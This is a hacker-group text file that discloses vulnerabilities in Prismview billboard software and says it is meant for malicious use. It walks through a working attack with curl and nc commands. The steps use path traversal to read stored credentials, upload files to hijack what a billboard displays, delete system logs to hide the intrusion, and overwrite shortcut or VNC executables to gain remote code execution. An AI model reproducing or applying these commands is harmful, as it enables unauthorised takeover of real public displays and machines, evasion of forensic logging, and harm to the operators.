[09-08-2019]
KEK KOMMUNIKATIONS BRINGS YOU...
█████ ████ █████
░░███ ███░ ░░███
░███ ███ ██████ ░███ █████ █████ ██████ ██████
░███████ ███░░███ ░███░░███ ███░░ ███░░███ ███░░███
░███░░███ ░███████ ░██████░ ░░█████ ░███████ ░███ ░░░
░███ ░░███ ░███░░░ ░███░░███ ░░░░███░███░░░ ░███ ███
█████ ░░████░░██████ ████ █████ ██████ ░░██████ ░░██████
░░░░░ ░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░
INNOVATORS IN KEK─BASED TEKNOLOGY
EXPERTS IN RESPONSIBLE DISCLOSURE
GENERAL ALL-AROUND COOL D00DZ
╔═══════════════╗
║ prismview.txt ║
╒═─═─═─═─═─═─═─═─═╩─═─═─═─═─═─═─═─╩═─═─═─═─═─═─═─═─═╕
┃ This file is presented for malicious purposes ┃
┃ only. Keksec takes no responsibility for ┃
┃ the use of the information in this file by ┃
┃ shit-eating whitehats, or for the patching of ┃
┃ any vulnerabilities disclosed in this file by ┃
┃ butthurt SWEs. ┃
╘═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═╛
Hello?...
Are we still live?...
Ah, there you are! Our faithful friend! Our fantastic follower! We're
very sorry for being gone for so long. Sadly, as with all things, we
have weened and waned in and out of existence. Heat has come and gone.
Boxes, shells, and exploits too have seen the light of day only to be
snuffed out by zealous whitehats. Somehow, despite the religious fervor
of the whitehat, our billboard vulns haven't been killed. You shitters
really dropped the ball. No, YESCO, telling customers to move boards
behind a VPN is *not* a patch. In this file we're dropping the deetz on
YESCO's (and now Samsung's) Prismview billboard software.
Public Disclosure Timeline:
Found: maliciously
Contacted vendor: technically
Disclosed publicly: affirmatively
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
It should first be said that Prismview is a piece of software as well
as a company. The company was owned by YESCO, under which it developed
the initial Prismview software and was then sold to Samsung. The
Prismview software is simply a C# HTTP server which runs on an embedded
Windows installation. It handles scheduling for different images as
well as diagnostics. These Windows installations also come standard
with VNC, AV (usually Mcafee or Kaspersky), and other basic software.
Since developing that software Prismview was sold to Samsung and it
would seem that they've transitioned to a model similar to Lamar's.
We would like to take this time to remind Samsung, again, that shoving
your shit behind a VPN does not make it secure.
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
In order to control a Prismview billboard, a client program is provided
which implements calls to an HTTP API on the YESCO Prismview server
(referred to as Prismview from now on). All of these operations occur
within the Prismview install directory (%USERPROFILE\Prismview Player),
and all directories mentioned from now on are within that directory
unless specified otherwise. Here we will go over some endpoints of
interest:
/AMILOGGEDIN
Responds with "OK" if the current IP is logged in or authentication is
disabled. We would tell you which endpoints require authentication but,
as seems to be the Prismview way, this varies between releases.
/PRISMVIEWLOGIN001
Takes two headers, "User" and "Password", and checks if they are equal
to the value configured. If so, it adds the requesting IP to a list of
logged in users. Returns "OK Password" on success or
"OK Password - Not Applicable" if the password was correct but
authentication is disabled.
/PREPAREFORSPLITFILE
Clears the Joiner\ directory. Responds with "OK" on success.
/SPLITUPLOAD
Takes a multipart octet stream and saves it to the file name specified
by the multipart within the Joiner\ directory. Responds
"File Uploaded." on success.
/SPLITJOIN
Reads the file at Joiner\SplitterInfo.xml with the format
<FileSplitterJoinerInfoPacket>
<OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded>
<NumberOfFiles>1337</NumberOfFiles>
<LastWriteTime>2011-11-11T11:11:11</LastWriteTime>
</FileSplitterJoinerInfoPacket>
If NumberOfFiles is 3, for example, it will concatenate XferFile.0,
XferFile.1, and XferFile.2. It will then write the result of this
concatenation to OutputPathAndNameUnicoded within the XFER directory.
Doesn't sanitize OutputPathAndNameUnicoded. Responds "OK" on success.
/REBOOTSYSTEM
Runs the RebootSystem.lnk file in the Prismview directory.
/RESTARTPLAYER
Runs the RestartPlayer.lnk file in the Prismview directory.
/RESTARTVNC
Kills all processes with the name "WinVNC" and tries to run the
following programs in order with the single argument "-run":
C:\Program Files\UltraVNC\WinVNC.exe
TightVNC-unstable\WinVNC.exe
TightVNC\WinVNC.exe
VNC\WinVNC.exe
/UPLOAD
Takes a multipart octet stream and the file name, creation year, month,
day, hour, minute, second, and another option which is simply left as
"NA" as comma separated values in HTTP header "prismxfer001". An
example is given in the next section.
/UPLOAD2
Takes a multipart octet stream and the following HTTP headers:
PrismXfer-DestName (base64 encoded upload path)
PrismXfer-FileLength
PrismXfer-FileLastWriteTimeUTC
PrismXfer-MD5Checksum
Writes the file to to XFER\. Doesn't sanitize DestName.
/VIEWSCREEN.JPG and/or /VIEWSCREENALL.JPG
Returns a JPEG screen capture of the running server.
/PV9COMMAND
Only has to start with /PV9COMMAND. The request path is then split by
the character '|' and continues only if the resulting array is larger
than 1. The first entry in this resulting array is used as the command,
and the rest are arguments. For example, given that you requested the
path "/PV9COMMAND|INSTANTPLAY1|image.jpg|99", it would run the
INSTANTPLAY1 command with arguments "image.jpg" and "99". Some commands
offered are as follows:
INSTANTPLAY1|{PATH}|{REPEATS}
Plays the image at OperatingMedia/{PATH} REPEATS times on whatever is
attached to the Prismview server. Doesn't sanitize PATH.
INSTANTPLAY2|{PATH}|{REPEATS}
The same as INSTANTPLAY1 except if there is a file at XFER/Media it
will copy that file into OperatingMedia prior to playing it.
DELETEFILE1|{PATH}
Deletes the file at XFER\{PATH}. Doesn't sanitize PATH.
CREATEFOLDER|{PATH}
Creates a directory at XFER\{PATH}. Again, doesn't sanitize PATH.
/../PrismviewV9-Player-006.xml
O-oh.
If the Prismview server can't find an endpoint to handle a request with,
it searches in OperatingMedia/ for the file requested. It doesn't check
for LFI and is very stupid. That XML file contains the username and
password required to authenticate with the Prismview server.
It should also be remembered that the Prismview team was immensely
disorganized in creating the Prismview software. Depending on the
version, any number of these endpoints will actually exist. Thankfully,
the Prismview executable is usually at the same place across version.
You can simply use the LFI to download the executable and open it in
your favorite C# decompiler. The most obviously broken code is in
UserControlWebServer class or one named similarly.
There are far more endpoints of course, but we feel this will give you
at least some idea as to the workings of Prismview.
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
Now we will work you through how a master hacker like yourself might go
about finding and exploiting these billboards.
Prismview uses the WeOnlyDo C# webserver API, so some early versions
use that as their HTTP Server header. Later versions simply use some
variation of "Prismview Player". Shodan searches will bring back a few
but not many. More can be found with more comprehensive scans of
business or 4G IP ranges.
You can then find out if authentication is enabled or not by requesting
/AMILOGGEDIN.
# If authentication is disabled you will see something like this
$ curl http://LAME/AMILOGGEDIN
OK
# If it is enabled, you will see this
$ curl http://LAME/AMILOGGEDIN
Failed
If you see "Failed", don't worry. We can simply use our handy dandy LFI
to obtain the Username and Password properties of the configuration
file.
# Note that the name of this file and possibly its location vary per
# release. We leave figuring this out as an exercise for the reader :^)
$ echo -e 'GET /../PrismviewV9-Player-006.xml HTTP/1.0\r\n' \
| nc LAME 80
...
<UserName>bkrebs</UserName>
<Password>god</Password
...
You can then authenticate with the server
$ curl -H'User: bkrebs' -H'Password: god' http://LAME/PRISMVIEWLOGIN001
OK Password
And use one of the many methods available to upload your image
$ mv image.jpg XferFile.0
$ curl -F file=@XferFile.0 http://LAME/SPLITUPLOAD
File uploaded.
$ echo 'PEZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+CiAgPE91dHB1dFBhdGhB'\
'bmROYW1lVW5pY29kZWQ+Li4vcGF0aCA6Xik8L091dHB1dFBhdGhBbmROYW1l'\
'VW5pY29kZWQ+CiAgPE51bWJlck9mRmlsZXM+MTMzNzwvTnVtYmVyT2ZGaWxl'\
'cz4KICA8TGFzdFdyaXRlVGltZT4yMDExLTExLTExVDExOjExOjExPC9MYXN0'\
'V3JpdGVUaW1lPgo8L0ZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+Cgo='\
| base64 --decode > SplitterInfo.xml
$ curl -F file=@SplitterInfo.xml http://LAME/SPLITUPLOAD
File uploaded.
$ curl http://LAME/SPLITJOIN
OK
or
$ curl -F file=@image.jpg -H'prismxfer001: 2011,11,11,11,11,11,NA' \
http://LAME/UPLOAD
or
$ curl -F file=@image.jpg \
-H'PrismXfer-DestName: SEFLS0EgSEFLS0EgSEFLS0E=' \
-H'PrismXfer-FileLength: 632094'
-H'PrismXfer-FileLastWriteTimeUTC: 2015-03-03-T00:00:00' \
-H'PrismXfer-MD5Checksum: 07094d279ef4502e07477fa58631113b' \
http://LAME/UPLOAD2
etc.
Depending on where you uploaded your image to there are several ways to
play it. The laziest would be to refresh the home page and wait until
an image is playing with the same file extension as the one you wish to
put up. Then you can simply upload your image over that file and it
will play the next time the schedule loops around. If you can't find an
image with the same extension, just upload the image file to
OperatingMedia\ and play it using INSTANTPLAY1.
$ curl 'http://LAME/PV9COMMAND|INSTANTPLAY1'\
'|image.jpg'\
'|999999'
OK
If you're lazy you're done here. If not, you probably want to at least
unlink the logs.
$ curl 'http://LAME/GETLISTLOGDIRECTORY'
...
SystemLog-06-08-37.lg 344 6/8/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/9/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/10/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/11/1337 12:00 AM
...
$ curl 'http://LAME/PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg'
OK
Getting code execution is fairly easy as well. Just upload a file to
overwrite RebootSystem.lnk in the Prismview directory or any of the
WinVNC.exes and then request /REBOOTSYSTEM or /RESTARTVNC to execute
it.
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
In conclusion, fuck YESCO, fuck Samsung, and fuck Prismview.
GLHF
<3 keksec
[@le_keksec]
[le_keksec@protonmail.com]
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
greets to thugcrowd and conflict ;-*
